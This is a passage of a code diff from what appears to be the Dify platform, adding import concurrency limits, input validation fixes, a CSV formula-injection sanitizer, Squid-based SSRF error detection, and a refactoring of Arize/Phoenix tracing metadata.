return view(*args, **kwargs)
return decorated
def annotation_import_concurrency_limit(view: Callable[P, R]):
"""
Concurrency control decorator for annotation import operations.
Limits the number of concurrent import tasks per tenant to prevent
resource exhaustion and ensure fair resource allocation.
Uses Redis ZSET to track active import jobs with automatic cleanup
of stale entries (jobs older than 2 minutes).
"""
@wraps(view)
def decorated(*args: P.args, **kwargs: P.kwargs):
_, current_tenant_id = current_account_with_tenant()
current_time = int(time.time() * 1000)
active_jobs_key = f"annotation_import_active:{current_tenant_id}"
# Clean up stale entries (jobs that should have completed or timed out)
stale_threshold = current_time - 120000 # 2 minutes ago
redis_client.zremrangebyscore(active_jobs_key, 0, stale_threshold)
# Check current active job count
active_count = redis_client.zcard(active_jobs_key)
if active_count >= dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT:
abort(
429,
f"Too many concurrent import tasks. Maximum {dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT} "
f"concurrent imports allowed per workspace. Please wait for existing imports to complete.",
)
# Allow the request to proceed
# The actual job registration will happen in the service layer
return view(*args, **kwargs)
return decorated

View File

@ -61,6 +61,9 @@ class ChatRequestPayload(BaseModel):
@classmethod
def normalize_conversation_id(cls, value: str | UUID | None) -> str | None:
"""Allow missing or blank conversation IDs; enforce UUID format when provided."""
if isinstance(value, str):
value = value.strip()
if not value:
return None

View File

@ -4,7 +4,7 @@ from uuid import UUID
from flask import request
from flask_restx import Resource
from flask_restx._http import HTTPStatus
from pydantic import BaseModel, Field
from pydantic import BaseModel, Field, model_validator
from sqlalchemy.orm import Session
from werkzeug.exceptions import BadRequest, NotFound
@ -37,9 +37,16 @@ class ConversationListQuery(BaseModel):
class ConversationRenamePayload(BaseModel):
name: str = Field(description="New conversation name")
name: str | None = Field(default=None, description="New conversation name (required if auto_generate is false)")
auto_generate: bool = Field(default=False, description="Auto-generate conversation name")
@model_validator(mode="after")
def validate_name_requirement(self):
if not self.auto_generate:
if self.name is None or not self.name.strip():
raise ValueError("name is required when auto_generate is false")
return self
class ConversationVariablesQuery(BaseModel):
last_id: UUID | None = Field(default=None, description="Last variable ID for pagination")

View File

@ -33,7 +33,7 @@ def trigger_endpoint(endpoint_id: str):
if response:
break
if not response:
logger.error("Endpoint not found for {endpoint_id}")
logger.info("Endpoint not found for %s", endpoint_id)
return jsonify({"error": "Endpoint not found"}), 404
return response
except ValueError as e:

0
api/core/db/__init__.py Normal file
View File

View File

@ -0,0 +1,38 @@
from sqlalchemy import Engine
from sqlalchemy.orm import Session, sessionmaker
_session_maker: sessionmaker | None = None
def configure_session_factory(engine: Engine, expire_on_commit: bool = False):
"""Configure the global session factory"""
global _session_maker
_session_maker = sessionmaker(bind=engine, expire_on_commit=expire_on_commit)
def get_session_maker() -> sessionmaker:
if _session_maker is None:
raise RuntimeError("Session factory not configured. Call configure_session_factory() first.")
return _session_maker
def create_session() -> Session:
return get_session_maker()()
# Class wrapper for convenience
class SessionFactory:
@staticmethod
def configure(engine: Engine, expire_on_commit: bool = False):
configure_session_factory(engine, expire_on_commit)
@staticmethod
def get_session_maker() -> sessionmaker:
return get_session_maker()
@staticmethod
def create_session() -> Session:
return create_session()
session_factory = SessionFactory()

View File

@ -1,4 +1,4 @@
from pydantic import BaseModel, Field
from pydantic import BaseModel, Field, field_validator
class PreviewDetail(BaseModel):
@ -20,9 +20,17 @@ class IndexingEstimate(BaseModel):
class PipelineDataset(BaseModel):
id: str
name: str
description: str | None = Field(default="", description="knowledge dataset description")
description: str = Field(default="", description="knowledge dataset description")
chunk_structure: str
@field_validator("description", mode="before")
@classmethod
def normalize_description(cls, value: str | None) -> str:
"""Coerce None to empty string so description is always a string."""
if value is None:
return ""
return value
class PipelineDocument(BaseModel):
id: str

View File

@ -213,12 +213,23 @@ class MCPProviderEntity(BaseModel):
return None
def retrieve_tokens(self) -> OAuthTokens | None:
"""OAuth tokens if available"""
"""Retrieve OAuth tokens if authentication is complete.
Returns:
OAuthTokens if the provider has been authenticated, None otherwise.
"""
if not self.credentials:
return None
credentials = self.decrypt_credentials()
access_token = credentials.get("access_token", "")
# Return None if access_token is empty to avoid generating invalid "Authorization: Bearer " header.
# Note: We don't check for whitespace-only strings here because:
# 1. OAuth servers don't return whitespace-only access tokens in practice
# 2. Even if they did, the server would return 401, triggering the OAuth flow correctly
if not access_token:
return None
return OAuthTokens(
access_token=credentials.get("access_token", ""),
access_token=access_token,
token_type=credentials.get("token_type", DEFAULT_TOKEN_TYPE),
expires_in=int(credentials.get("expires_in", str(DEFAULT_EXPIRES_IN)) or DEFAULT_EXPIRES_IN),
refresh_token=credentials.get("refresh_token", ""),

View File

@ -0,0 +1,89 @@
"""CSV sanitization utilities to prevent formula injection attacks."""
from typing import Any
class CSVSanitizer:
"""
Sanitizer for CSV export to prevent formula injection attacks.
This class provides methods to sanitize data before CSV export by escaping
characters that could be interpreted as formulas by spreadsheet applications
(Excel, LibreOffice, Google Sheets).
Formula injection occurs when user-controlled data starting with special
characters (=, +, -, @, tab, carriage return) is exported to CSV and opened
in a spreadsheet application, potentially executing malicious commands.
"""
# Characters that can start a formula in Excel/LibreOffice/Google Sheets
FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"})
@classmethod
def sanitize_value(cls, value: Any) -> str:
"""
Sanitize a value for safe CSV export.
Prefixes formula-initiating characters with a single quote to prevent
Excel/LibreOffice/Google Sheets from treating them as formulas.
Args:
value: The value to sanitize (will be converted to string)
Returns:
Sanitized string safe for CSV export
Examples:
>>> CSVSanitizer.sanitize_value("=1+1")
"'=1+1"
>>> CSVSanitizer.sanitize_value("Hello World")
"Hello World"
>>> CSVSanitizer.sanitize_value(None)
""
"""
if value is None:
return ""
# Convert to string
str_value = str(value)
# If empty, return as is
if not str_value:
return ""
# Check if first character is a formula initiator
if str_value[0] in cls.FORMULA_CHARS:
# Prefix with single quote to escape
return f"'{str_value}"
return str_value
@classmethod
def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]:
"""
Sanitize specified fields in a dictionary.
Args:
data: Dictionary containing data to sanitize
fields_to_sanitize: List of field names to sanitize.
If None, sanitizes all string fields.
Returns:
Dictionary with sanitized values (creates a shallow copy)
Examples:
>>> data = {"question": "=1+1", "answer": "+calc", "id": "123"}
>>> CSVSanitizer.sanitize_dict(data, ["question", "answer"])
{"question": "'=1+1", "answer": "'+calc", "id": "123"}
"""
sanitized = data.copy()
if fields_to_sanitize is None:
# Sanitize all string fields
fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)]
for field in fields_to_sanitize:
if field in sanitized:
sanitized[field] = cls.sanitize_value(sanitized[field])
return sanitized

View File

@ -9,6 +9,7 @@ import httpx
from configs import dify_config
from core.helper.http_client_pooling import get_pooled_http_client
from core.tools.errors import ToolSSRFError
logger = logging.getLogger(__name__)
@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs):
while retries <= max_retries:
try:
response = client.request(method=method, url=url, **kwargs)
# Check for SSRF protection by Squid proxy
if response.status_code in (401, 403):
# Check if this is a Squid SSRF rejection
server_header = response.headers.get("server", "").lower()
via_header = response.headers.get("via", "").lower()
# Squid typically identifies itself in Server or Via headers
if "squid" in server_header or "squid" in via_header:
raise ToolSSRFError(
f"Access to '{url}' was blocked by SSRF protection. "
f"The URL may point to a private or local network address. "
)
if response.status_code not in STATUS_FORCELIST:
return response

View File

@ -72,15 +72,22 @@ class LLMGenerator:
prompt_messages=list(prompts), model_parameters={"max_tokens": 500, "temperature": 1}, stream=False
)
answer = cast(str, response.message.content)
cleaned_answer = re.sub(r"^.*(\{.*\}).*$", r"\1", answer, flags=re.DOTALL)
if cleaned_answer is None:
if answer is None:
return ""
try:
result_dict = json.loads(cleaned_answer)
answer = result_dict["Your Output"]
result_dict = json.loads(answer)
except json.JSONDecodeError:
logger.exception("Failed to generate name after answer, use query instead")
result_dict = json_repair.loads(answer)
if not isinstance(result_dict, dict):
answer = query
else:
output = result_dict.get("Your Output")
if isinstance(output, str) and output.strip():
answer = output.strip()
else:
answer = query
name = answer.strip()
if len(name) > 75:

View File

@ -6,7 +6,13 @@ from datetime import datetime, timedelta
from typing import Any, Union, cast
from urllib.parse import urlparse
from openinference.semconv.trace import OpenInferenceMimeTypeValues, OpenInferenceSpanKindValues, SpanAttributes
from openinference.semconv.trace import (
MessageAttributes,
OpenInferenceMimeTypeValues,
OpenInferenceSpanKindValues,
SpanAttributes,
ToolCallAttributes,
)
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter as GrpcOTLPSpanExporter
from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter as HttpOTLPSpanExporter
from opentelemetry.sdk import trace as trace_sdk
@ -95,14 +101,14 @@ def setup_tracer(arize_phoenix_config: ArizeConfig | PhoenixConfig) -> tuple[tra
def datetime_to_nanos(dt: datetime | None) -> int:
"""Convert datetime to nanoseconds since epoch. If None, use current time."""
"""Convert datetime to nanoseconds since epoch for Arize/Phoenix."""
if dt is None:
dt = datetime.now()
return int(dt.timestamp() * 1_000_000_000)
def error_to_string(error: Exception | str | None) -> str:
"""Convert an error to a string with traceback information."""
"""Convert an error to a string with traceback information for Arize/Phoenix."""
error_message = "Empty Stack Trace"
if error:
if isinstance(error, Exception):
@ -114,7 +120,7 @@ def error_to_string(error: Exception | str | None) -> str:
def set_span_status(current_span: Span, error: Exception | str | None = None):
"""Set the status of the current span based on the presence of an error."""
"""Set the status of the current span based on the presence of an error for Arize/Phoenix."""
if error:
error_string = error_to_string(error)
current_span.set_status(Status(StatusCode.ERROR, error_string))
@ -138,10 +144,17 @@ def set_span_status(current_span: Span, error: Exception | str | None = None):
def safe_json_dumps(obj: Any) -> str:
"""A convenience wrapper around `json.dumps` that ensures that any object can be safely encoded."""
"""A convenience wrapper to ensure that any object can be safely encoded for Arize/Phoenix."""
return json.dumps(obj, default=str, ensure_ascii=False)
def wrap_span_metadata(metadata, **kwargs):
"""Add common metatada to all trace entity types for Arize/Phoenix."""
metadata["created_from"] = "Dify"
metadata.update(kwargs)
return metadata
class ArizePhoenixDataTrace(BaseTraceInstance):
def __init__(
self,
@ -183,16 +196,27 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
raise
def workflow_trace(self, trace_info: WorkflowTraceInfo):
workflow_metadata = {
"workflow_run_id": trace_info.workflow_run_id or "",
"message_id": trace_info.message_id or "",
"workflow_app_log_id": trace_info.workflow_app_log_id or "",
"status": trace_info.workflow_run_status or "",
"status_message": trace_info.error or "",
"level": "ERROR" if trace_info.error else "DEFAULT",
"total_tokens": trace_info.total_tokens or 0,
}
workflow_metadata.update(trace_info.metadata)
file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else []
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.workflow_run_status or "",
status_message=trace_info.error or "",
level="ERROR" if trace_info.error else "DEFAULT",
trace_entity_type="workflow",
conversation_id=trace_info.conversation_id or "",
workflow_app_log_id=trace_info.workflow_app_log_id or "",
workflow_id=trace_info.workflow_id or "",
tenant_id=trace_info.tenant_id or "",
workflow_run_id=trace_info.workflow_run_id or "",
workflow_run_elapsed_time=trace_info.workflow_run_elapsed_time or 0,
workflow_run_version=trace_info.workflow_run_version or "",
total_tokens=trace_info.total_tokens or 0,
file_list=safe_json_dumps(file_list),
query=trace_info.query or "",
)
dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.workflow_run_id
self.ensure_root_span(dify_trace_id)
@ -201,10 +225,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
workflow_span = self.tracer.start_span(
name=TraceTaskName.WORKFLOW_TRACE.value,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.workflow_run_inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.workflow_run_outputs, ensure_ascii=False),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value,
SpanAttributes.METADATA: json.dumps(workflow_metadata, ensure_ascii=False),
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.workflow_run_inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.workflow_run_outputs),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
SpanAttributes.SESSION_ID: trace_info.conversation_id or "",
},
start_time=datetime_to_nanos(trace_info.start_time),
@ -257,6 +283,7 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
"app_id": app_id,
"app_name": node_execution.title,
"status": node_execution.status,
"status_message": node_execution.error or "",
"level": "ERROR" if node_execution.status == "failed" else "DEFAULT",
}
)
@ -290,11 +317,11 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
node_span = self.tracer.start_span(
name=node_execution.node_type,
attributes={
SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value,
SpanAttributes.INPUT_VALUE: safe_json_dumps(inputs_value),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps(outputs_value),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value,
SpanAttributes.METADATA: safe_json_dumps(node_metadata),
SpanAttributes.SESSION_ID: trace_info.conversation_id or "",
},
@ -339,30 +366,37 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
def message_trace(self, trace_info: MessageTraceInfo):
if trace_info.message_data is None:
logger.warning("[Arize/Phoenix] Message data is None, skipping message trace.")
return
file_list = cast(list[str], trace_info.file_list) or []
file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else []
message_file_data: MessageFile | None = trace_info.message_file_data
if message_file_data is not None:
file_url = f"{self.file_base_url}/{message_file_data.url}" if message_file_data else ""
file_list.append(file_url)
message_metadata = {
"message_id": trace_info.message_id or "",
"conversation_mode": str(trace_info.conversation_mode or ""),
"user_id": trace_info.message_data.from_account_id or "",
"file_list": json.dumps(file_list),
"status": trace_info.message_data.status or "",
"status_message": trace_info.error or "",
"level": "ERROR" if trace_info.error else "DEFAULT",
"total_tokens": trace_info.total_tokens or 0,
"prompt_tokens": trace_info.message_tokens or 0,
"completion_tokens": trace_info.answer_tokens or 0,
"ls_provider": trace_info.message_data.model_provider or "",
"ls_model_name": trace_info.message_data.model_id or "",
}
message_metadata.update(trace_info.metadata)
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.message_data.status or "",
status_message=trace_info.error or "",
level="ERROR" if trace_info.error else "DEFAULT",
trace_entity_type="message",
conversation_model=trace_info.conversation_model or "",
message_tokens=trace_info.message_tokens or 0,
answer_tokens=trace_info.answer_tokens or 0,
total_tokens=trace_info.total_tokens or 0,
conversation_mode=trace_info.conversation_mode or "",
gen_ai_server_time_to_first_token=trace_info.gen_ai_server_time_to_first_token or 0,
llm_streaming_time_to_generate=trace_info.llm_streaming_time_to_generate or 0,
is_streaming_request=trace_info.is_streaming_request or False,
user_id=trace_info.message_data.from_account_id or "",
file_list=safe_json_dumps(file_list),
model_provider=trace_info.message_data.model_provider or "",
model_id=trace_info.message_data.model_id or "",
)
# Add end user data if available
if trace_info.message_data.from_end_user_id:
@ -370,14 +404,16 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
db.session.query(EndUser).where(EndUser.id == trace_info.message_data.from_end_user_id).first()
)
if end_user_data is not None:
message_metadata["end_user_id"] = end_user_data.session_id
metadata["end_user_id"] = end_user_data.session_id
attributes = {
SpanAttributes.INPUT_VALUE: trace_info.message_data.query,
SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer,
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value,
SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False),
SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id,
SpanAttributes.INPUT_VALUE: trace_info.message_data.query,
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value,
SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer,
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "",
}
dify_trace_id = trace_info.trace_id or trace_info.message_id
@ -393,8 +429,10 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
try:
# Convert outputs to string based on type
outputs_mime_type = OpenInferenceMimeTypeValues.TEXT.value
if isinstance(trace_info.outputs, dict | list):
outputs_str = json.dumps(trace_info.outputs, ensure_ascii=False)
outputs_str = safe_json_dumps(trace_info.outputs)
outputs_mime_type = OpenInferenceMimeTypeValues.JSON.value
elif isinstance(trace_info.outputs, str):
outputs_str = trace_info.outputs
else:
@ -402,10 +440,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
llm_attributes = {
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.LLM.value,
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False),
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: outputs_str,
SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False),
SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id,
SpanAttributes.OUTPUT_MIME_TYPE: outputs_mime_type,
SpanAttributes.METADATA: safe_json_dumps(metadata),
SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "",
}
llm_attributes.update(self._construct_llm_attributes(trace_info.inputs))
if trace_info.total_tokens is not None and trace_info.total_tokens > 0:
@ -449,16 +489,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
def moderation_trace(self, trace_info: ModerationTraceInfo):
if trace_info.message_data is None:
logger.warning("[Arize/Phoenix] Message data is None, skipping moderation trace.")
return
metadata = {
"message_id": trace_info.message_id,
"tool_name": "moderation",
"status": trace_info.message_data.status,
"status_message": trace_info.message_data.error or "",
"level": "ERROR" if trace_info.message_data.error else "DEFAULT",
}
metadata.update(trace_info.metadata)
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.message_data.status or "",
status_message=trace_info.message_data.error or "",
level="ERROR" if trace_info.message_data.error else "DEFAULT",
trace_entity_type="moderation",
model_provider=trace_info.message_data.model_provider or "",
model_id=trace_info.message_data.model_id or "",
)
dify_trace_id = trace_info.trace_id or trace_info.message_id
self.ensure_root_span(dify_trace_id)
@ -467,18 +511,19 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
span = self.tracer.start_span(
name=TraceTaskName.MODERATION_TRACE.value,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: json.dumps(
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value,
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps(
{
"action": trace_info.action,
"flagged": trace_info.flagged,
"action": trace_info.action,
"preset_response": trace_info.preset_response,
"inputs": trace_info.inputs,
},
ensure_ascii=False,
"query": trace_info.query,
}
),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value,
SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
},
start_time=datetime_to_nanos(trace_info.start_time),
context=root_span_context,
@ -494,22 +539,28 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
def suggested_question_trace(self, trace_info: SuggestedQuestionTraceInfo):
if trace_info.message_data is None:
logger.warning("[Arize/Phoenix] Message data is None, skipping suggested question trace.")
return
start_time = trace_info.start_time or trace_info.message_data.created_at
end_time = trace_info.end_time or trace_info.message_data.updated_at
metadata = {
"message_id": trace_info.message_id,
"tool_name": "suggested_question",
"status": trace_info.status,
"status_message": trace_info.error or "",
"level": "ERROR" if trace_info.error else "DEFAULT",
"total_tokens": trace_info.total_tokens,
"ls_provider": trace_info.model_provider or "",
"ls_model_name": trace_info.model_id or "",
}
metadata.update(trace_info.metadata)
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.status or "",
status_message=trace_info.status_message or "",
level=trace_info.level or "",
trace_entity_type="suggested_question",
total_tokens=trace_info.total_tokens or 0,
from_account_id=trace_info.from_account_id or "",
agent_based=trace_info.agent_based or False,
from_source=trace_info.from_source or "",
model_provider=trace_info.model_provider or "",
model_id=trace_info.model_id or "",
workflow_run_id=trace_info.workflow_run_id or "",
)
dify_trace_id = trace_info.trace_id or trace_info.message_id
self.ensure_root_span(dify_trace_id)
@ -518,10 +569,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
span = self.tracer.start_span(
name=TraceTaskName.SUGGESTED_QUESTION_TRACE.value,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.suggested_question, ensure_ascii=False),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value,
SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value,
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.suggested_question),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
},
start_time=datetime_to_nanos(start_time),
context=root_span_context,
@ -537,21 +590,23 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
def dataset_retrieval_trace(self, trace_info: DatasetRetrievalTraceInfo):
if trace_info.message_data is None:
logger.warning("[Arize/Phoenix] Message data is None, skipping dataset retrieval trace.")
return
start_time = trace_info.start_time or trace_info.message_data.created_at
end_time = trace_info.end_time or trace_info.message_data.updated_at
metadata = {
"message_id": trace_info.message_id,
"tool_name": "dataset_retrieval",
"status": trace_info.message_data.status,
"status_message": trace_info.message_data.error or "",
"level": "ERROR" if trace_info.message_data.error else "DEFAULT",
"ls_provider": trace_info.message_data.model_provider or "",
"ls_model_name": trace_info.message_data.model_id or "",
}
metadata.update(trace_info.metadata)
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.message_data.status or "",
status_message=trace_info.error or "",
level="ERROR" if trace_info.error else "DEFAULT",
trace_entity_type="dataset_retrieval",
model_provider=trace_info.message_data.model_provider or "",
model_id=trace_info.message_data.model_id or "",
)
dify_trace_id = trace_info.trace_id or trace_info.message_id
self.ensure_root_span(dify_trace_id)
@ -560,20 +615,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
span = self.tracer.start_span(
name=TraceTaskName.DATASET_RETRIEVAL_TRACE.value,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: json.dumps({"documents": trace_info.documents}, ensure_ascii=False),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.RETRIEVER.value,
SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False),
"start_time": start_time.isoformat() if start_time else "",
"end_time": end_time.isoformat() if end_time else "",
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps({"documents": trace_info.documents}),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
},
start_time=datetime_to_nanos(start_time),
context=root_span_context,
)
try:
if trace_info.message_data.error:
set_span_status(span, trace_info.message_data.error)
if trace_info.error:
set_span_status(span, trace_info.error)
else:
set_span_status(span)
finally:
@ -584,30 +639,34 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
logger.warning("[Arize/Phoenix] Message data is None, skipping tool trace.")
return
metadata = {
"message_id": trace_info.message_id,
"tool_config": json.dumps(trace_info.tool_config, ensure_ascii=False),
}
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.message_data.status or "",
status_message=trace_info.error or "",
level="ERROR" if trace_info.error else "DEFAULT",
trace_entity_type="tool",
tool_config=safe_json_dumps(trace_info.tool_config),
time_cost=trace_info.time_cost or 0,
file_url=trace_info.file_url or "",
)
dify_trace_id = trace_info.trace_id or trace_info.message_id
self.ensure_root_span(dify_trace_id)
root_span_context = self.propagator.extract(carrier=self.carrier)
tool_params_str = (
json.dumps(trace_info.tool_parameters, ensure_ascii=False)
if isinstance(trace_info.tool_parameters, dict)
else str(trace_info.tool_parameters)
)
span = self.tracer.start_span(
name=trace_info.tool_name,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.tool_inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs,
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value,
SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False),
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.tool_inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs,
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
SpanAttributes.TOOL_NAME: trace_info.tool_name,
SpanAttributes.TOOL_PARAMETERS: tool_params_str,
SpanAttributes.TOOL_PARAMETERS: safe_json_dumps(trace_info.tool_parameters),
},
start_time=datetime_to_nanos(trace_info.start_time),
context=root_span_context,
@ -623,16 +682,22 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
def generate_name_trace(self, trace_info: GenerateNameTraceInfo):
if trace_info.message_data is None:
logger.warning("[Arize/Phoenix] Message data is None, skipping generate name trace.")
return
metadata = {
"project_name": self.project,
"message_id": trace_info.message_id,
"status": trace_info.message_data.status,
"status_message": trace_info.message_data.error or "",
"level": "ERROR" if trace_info.message_data.error else "DEFAULT",
}
metadata.update(trace_info.metadata)
metadata = wrap_span_metadata(
trace_info.metadata,
trace_id=trace_info.trace_id or "",
message_id=trace_info.message_id or "",
status=trace_info.message_data.status or "",
status_message=trace_info.message_data.error or "",
level="ERROR" if trace_info.message_data.error else "DEFAULT",
trace_entity_type="generate_name",
model_provider=trace_info.message_data.model_provider or "",
model_id=trace_info.message_data.model_id or "",
conversation_id=trace_info.conversation_id or "",
tenant_id=trace_info.tenant_id,
)
dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.conversation_id
self.ensure_root_span(dify_trace_id)
@ -641,13 +706,13 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
span = self.tracer.start_span(
name=TraceTaskName.GENERATE_NAME_TRACE.value,
attributes={
SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False),
SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.outputs, ensure_ascii=False),
SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value,
SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False),
SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id,
"start_time": trace_info.start_time.isoformat() if trace_info.start_time else "",
"end_time": trace_info.end_time.isoformat() if trace_info.end_time else "",
SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs),
SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.outputs),
SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value,
SpanAttributes.METADATA: safe_json_dumps(metadata),
SpanAttributes.SESSION_ID: trace_info.conversation_id or "",
},
start_time=datetime_to_nanos(trace_info.start_time),
context=root_span_context,
@ -688,32 +753,85 @@ class ArizePhoenixDataTrace(BaseTraceInstance):
raise ValueError(f"[Arize/Phoenix] API check failed: {str(e)}")
def get_project_url(self):
"""Build a redirect URL that forwards the user to the correct project for Arize/Phoenix."""
try:
if self.arize_phoenix_config.endpoint == "https://otlp.arize.com":
return "https://app.arize.com/"
else:
return f"{self.arize_phoenix_config.endpoint}/projects/"
project_name = self.arize_phoenix_config.project
endpoint = self.arize_phoenix_config.endpoint.rstrip("/")
# Arize
if isinstance(self.arize_phoenix_config, ArizeConfig):
